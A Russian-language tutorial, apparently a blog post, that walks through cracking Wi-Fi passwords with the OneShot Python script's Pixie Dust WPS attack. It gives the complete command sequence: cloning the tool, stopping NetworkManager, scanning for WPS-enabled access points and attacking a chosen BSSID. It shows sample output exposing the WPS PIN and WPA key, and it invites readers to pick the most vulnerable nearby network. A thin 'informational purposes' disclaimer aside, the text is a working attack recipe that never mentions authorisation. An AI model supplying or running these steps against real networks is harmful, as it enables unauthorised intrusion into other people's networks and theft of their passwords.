Взлом Wifi атакой PixieDust

Взлом Wifi атакой PixieDust

Вертикаль

Привет!

Данная статья представлена исключительно в ознакомительных целях и не несет призыва к действию. Вся информация направлена на то, чтобы уберечь читателей от противозаконных действий.

OneShot это скрипт на Python, который выполняет атаку Pixie Dust без необходимости переключаться в режим монитора. Для получения необходимых данных используется wpa_supplicant.

Как уже было сказано выше, его особенность в том, что он использует атаку Pixie Dust. Но таких программ, на самом деле, уже достаточно. Вторая особенность этой программы в том, что ей не нужен режим монитора. Это означает, что подойдёт любая Wi-Fi карта — даже такая, с которой у вас раньше не получалось выполнить атаки. piratika

Хотя подойдёт любой Wi-Fi адаптер, лучше если у него внешняя антенна или же вам нужно находиться не слишком далеко от целевой точки доступа.

Программа OneShot очень проста в установке:

git clone https://github.com/drygdryg/OneShot
cd OneShot
sudo python3 oneshot.py -i wlan0

Как найти Wi-Fi сети с поддержкой WPS

Для запуска программы в отношении Точки Доступа Wi-Fi необходимо знать её BSSID, то есть её MAC-адрес. BSSID точек доступа можно посмотреть, к примеру, программой Airodump-ng. Эта программа требует режима монитора. @termuxmam. Но давайте исходить из того, что у нас обычный Wi-Fi адаптер, который не поддерживает режим монитора.
Выход из этой ситуации есть — BSSID распространяется в обычных фреймах (маячках) и операционная система всегда знает BSSID каждой Точки Доступа в округе (хотя обычно и не показывает эту информацию, поскольку большинству пользователей она не нужна).
Прежде чем приступить, начнём с того, что остановим NetworkManager, поскольку он постоянно будет мешаться нам:

sudo systemctl stop NetworkManager

Теперь нам нужно узнать имя беспроводного интерфейса. В Kali Linux это обычно wlan0. Если вы не знаете имя интерфейса в вашей системе, то выполните команду:

sudo iw dev

Строка, которая начинается на Interface, и содержит имя интерфейса.
Нужно активировать Wi-Fi адаптер командой вида:

sudo ip link set ИНТЕРФЕЙС up

Чтобы операционная система просканировала Точки Доступа в пределах досягаемости и показала нам информацию по ним, запустите такую команду:

sudo iw dev ИНТЕРФЕЙС scan

После сканирования, скорее всего, информации будет выведено ОЧЕНЬ много, пролистывайте и ищите те ТД для которых имеется поле WPS

Листаем чуть в низ. В этом списке BSSID называется BSS и для данной Точки Доступа значение равно b0:c2:87:4b:e0:fd. Больше нам никакая информация не нужна, но отметим, что уровень сигнала хороший, это отлично.

Атака Pixie Dust

Теперь нужно запустить команду вида:

sudo python3 oneshot.py -i wlan0 -b BSSID -K

При успехе получаем текст, где конце написано:

[+] WPS PIN: '12345670'
[+] WPA PSK: '0619560772'
[+] AP SSID: 'название точки'

WPA PISK: это пароль от точки доступа.

То есть эта ТД Wi-Fi не прошла аудит безопасности…

В случае неудачи на нашей стороне, будет выведено что-то вроде:

[-] WPS-FAIL error
[!] No enough data to run Pixie Dust attack

Не зная мас точки доступа, можно написать данную команду:

sudo python3 oneshot.py -i wlan0

Мы увидим список WIFI сетей. Зелёные — самые уязвимые. Просто выбирите номер ТД и всё, будет произведена атака.

Когда наиграетесь, то чтобы NetworkManager вновь заработал (и вернулось Интернет-подключение), выполните команду:

systemctl start NetworkManager

Report Page